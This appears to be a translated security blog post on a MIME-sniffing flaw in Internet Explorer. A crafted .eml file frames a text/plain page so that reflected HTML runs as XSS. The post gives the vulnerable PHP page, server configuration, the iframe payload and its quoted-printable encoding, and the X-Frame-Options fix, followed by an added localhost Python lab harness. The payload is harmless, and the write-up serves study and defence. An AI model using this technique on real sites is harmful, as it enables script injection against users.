We believe this vulnerability will one day be of real use to you. Note that in our tests it affected every version of IE on Windows 7, Windows 8.1 and Windows 10, while Microsoft Edge was not affected.

Vulnerability overview

When a server sends a response, the packet usually carries a number of headers. One of them is Content-Type, which tells the browser the media type (MIME type) of the returned content. For more on Content-Type, see the MDN article 【portal】.

During penetration tests we often run into pages that lack input validation or output encoding. Does that mean we have found an XSS vulnerability? Not necessarily: the response may come back with Content-Type "text/plain", and according to the specifications 【reference material 1】【Reference material 2】【Reference material 3】, when the Content-Type is "text/plain" the browser renders the body as plain text instead of parsing it as HTML, which is of little value to an attacker. Consider the following example, plain.php:

<?php
header("Content-Type: text/plain");
echo "Hello: ".$_GET["name"];
?>

This is a very simple script: it takes a single parameter and reflects it unencoded, and its first line sets the response Content-Type to "text/plain". Next, let's see whether we can inject some harmless HTML.

Sure enough, the injection succeeds, but the browser does not execute the injected code. The reason is simple: the response type is "text/plain".

Vulnerability analysis

Our research found that when IE opens a .eml file it performs MIME sniffing on the response, and if it identifies HTML/JS content inside, the browser executes that code.
First, EML stands for "Microsoft Outlook Express mail message": it is the Microsoft Outlook e-mail message format, which lets us store a mail message in a file. If you are interested in the format, see this RFC document 【portal】. Below is a sample .eml file you can use for testing:

root@kali:/var/www/html# cat testeml_1.eml
TESTEML
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable

Save the file on the web server and open it through IE. Note that there are two empty lines at the bottom of the file. You should see the browser display the content correctly. Also note that because of "Content-Transfer-Encoding: quoted-printable", the body is written with "=XX" escapes (for example "=3C" for "<") rather than the "%XX" escapes of URL encoding.

Test failed? Never mind: the cause is a wrong Content-Type. For .eml files the correct Content-Type is "message/rfc822". The following .htaccess file fixes it:

root@kali:/var/www/html# cat .htaccess
AddType message/rfc822 .eml

Now the Content-Type the server returns is correct.

Exploit

Next we reuse the sample file given above; the target is still plain.php. To carry out the attack we modify testeml_1.eml. The payload is:

<iframe src='plain.php?name=<HTML><h1>it works</h1>'></iframe>

After quoted-printable encoding it becomes:

=3Ciframe=20src=3D=27plain.php=3Fname=3D=3CHTML=3E=3Ch1=3Eit=20works=3C=2Fh1=3E=27=3E=3C=2Fiframe=3E

The final testeml_1.eml looks like this:

root@kali:/var/www/html# cat testeml_1.eml
TESTEML
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable

=3Ciframe=20src=3D=27plain.php=3Fname=3D=3CHTML=3E=3Ch1=3Eit=20works=3C=2Fh1=3E=27=3E=3C=2Fiframe=3E

Now open this file through IE; the result is shown in the screenshot.

As the screenshot shows, we have successfully exploited the vulnerability. Although plain.php still responds with Content-Type "text/plain", we can force IE to MIME-sniff it and execute our payload.

Solutions

The simplest fix is to add the header "X-Frame-Options: DENY" to the response of the vulnerable page (plain.php in this example): the .eml document can then no longer frame it, so the payload has nothing to sniff. Note that setting "X-Content-Type-Options: nosniff" does not prevent this attack.
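To reproduce the setup above without Apache and PHP, here is an added lab harness (example code written for this page, not the original post's tooling). It quoted-printable-encodes the post's iframe payload with the same conservative escaping the post used, wraps it in the .eml layout shown above, and serves it as message/rfc822 (the .htaccess line's equivalent) alongside an emulation of plain.php that reflects ?name= as text/plain. The --harden switch adds the X-Frame-Options: DENY header the post recommends so the two behaviours can be compared in IE. The file name lab.py, the port 8080 and all function names are our own choices.

```python
"""Added lab harness (not the original post's code): builds the quoted-printable
.eml payload described above and serves it the way the post's Apache setup does
(.eml as message/rfc822, plain.php reflecting ?name= as text/plain), with a
switch for the X-Frame-Options: DENY mitigation.  Function names are ours."""
import sys
import quopri
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

# The decoded payload from the post: an iframe that drags plain.php into the
# .eml document so IE sniffs its text/plain response as HTML.
PAYLOAD = "<iframe src='plain.php?name=<HTML><h1>it works</h1>'></iframe>"

# Conservative quoted-printable: only these bytes are sent literally, every
# other byte becomes =XX.  RFC 2045 permits more literals, but this set matches
# the post's sample, which escapes ' ', '<', '>', '=', '?', '/' and keeps '.'.
SAFE = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789.")


def encode_qp(text, max_line=None):
    """Quoted-printable encode `text` (=XX escapes, not the %XX of URL encoding).
    max_line=None gives the post's single long line; max_line=76 inserts the
    RFC 2045 soft line breaks ('=' + CRLF) that a strict MIME parser expects."""
    encoded = "".join(chr(b) if chr(b) in SAFE else f"={b:02X}"
                      for b in text.encode("utf-8"))
    if max_line is None:
        return encoded
    lines = []
    while len(encoded) > max_line:
        cut = max_line - 1                 # room for the trailing '=' soft break
        if encoded[cut - 1] == "=":        # would split '=XX' as '=' | 'XX'
            cut -= 1
        elif encoded[cut - 2] == "=":      # would split '=XX' as '=X' | 'X'
            cut -= 2
        lines.append(encoded[:cut] + "=")
        encoded = encoded[cut:]
    lines.append(encoded)
    return "\r\n".join(lines)


def decode_qp(encoded):
    """Decode with the standard library to check the round trip."""
    return quopri.decodestring(encoded.encode("ascii")).decode("utf-8")


def build_eml(html, max_line=None):
    """Minimal .eml in the post's shape: the TESTEML line and two headers,
    a blank line, the quoted-printable body, and two trailing empty lines."""
    return ("TESTEML\r\n"
            "Content-Type: text/html\r\n"
            "Content-Transfer-Encoding: quoted-printable\r\n"
            "\r\n"
            + encode_qp(html, max_line) + "\r\n\r\n")


def plain_php_response(query, harden=False):
    """Emulate plain.php: reflect ?name= unencoded as text/plain.  harden=True
    adds the header the post recommends (the post notes that
    X-Content-Type-Options: nosniff would not stop this attack)."""
    name = parse_qs(query).get("name", [""])[0]
    headers = [("Content-Type", "text/plain")]
    if harden:
        headers.append(("X-Frame-Options", "DENY"))
    return headers, ("Hello: " + name).encode("utf-8")


def route(path, query, harden=False):
    """Return (headers, body) for a request path, or None for a 404."""
    if path == "/plain.php":
        return plain_php_response(query, harden)
    if path.endswith(".eml"):
        # Equivalent of the post's .htaccess line: AddType message/rfc822 .eml
        return [("Content-Type", "message/rfc822")], build_eml(PAYLOAD).encode("ascii")
    return None


class LabHandler(BaseHTTPRequestHandler):
    harden = False

    def do_GET(self):
        url = urlparse(self.path)
        result = route(url.path, url.query, self.harden)
        if result is None:
            self.send_error(404)
            return
        headers, body = result
        self.send_response(200)
        for name, value in headers:
            self.send_header(name, value)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    # python3 lab.py [--harden]; then open http://127.0.0.1:8080/testeml_1.eml in IE
    LabHandler.harden = "--harden" in sys.argv
    HTTPServer(("127.0.0.1", 8080), LabHandler).serve_forever()
```

Run it once without and once with --harden and load http://127.0.0.1:8080/testeml_1.eml in IE on an affected Windows build: the iframe's relative src resolves to /plain.php on the same server, so the only difference between the two runs is the X-Frame-Options header. encode_qp(PAYLOAD) reproduces the post's encoded line byte for byte; pass max_line=76 if you need the soft line breaks that other MIME consumers require.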